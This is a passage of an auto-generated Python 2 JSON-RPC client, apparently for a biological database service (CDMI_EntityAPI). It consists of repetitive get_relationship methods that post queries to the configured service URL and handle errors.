'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsParticipatingAt(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsParticipatingAt',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_ParticipatesAt(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_ParticipatesAt',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsProteinFor(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsProteinFor',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_Produces(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_Produces',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsReagentIn(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsReagentIn',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_Targets(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_Targets',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsRealLocationOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsRealLocationOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HasRealLocationIn(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HasRealLocationIn',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsReferencedBy(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsReferencedBy',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_UsesReference(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_UsesReference',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsRegulatedIn(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsRegulatedIn',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsRegulatedSetOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsRegulatedSetOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsRegulatorFor(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsRegulatorFor',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HasRegulator(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HasRegulator',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsRegulatorForRegulon(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsRegulatorForRegulon',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_ReglonHasRegulator(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_ReglonHasRegulator',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsRegulatorySiteFor(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsRegulatorySiteFor',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HasRegulatorySite(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HasRegulatorySite',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsRelevantFor(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsRelevantFor',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsRelevantTo(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsRelevantTo',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsRepresentedBy(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsRepresentedBy',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_DefinedBy(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_DefinedBy',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsRoleOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsRoleOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HasRole(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HasRole',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsRowOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsRowOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsRoleFor(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsRoleFor',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsSequenceOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsSequenceOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HasAsSequence(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HasAsSequence',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsSourceForAssociationDataset(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsSourceForAssociationDataset',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_AssociationDatasetSourcedBy(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_AssociationDatasetSourcedBy',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsSubInstanceOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsSubInstanceOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_Validates(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_Validates',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsSummarizedBy(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsSummarizedBy',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
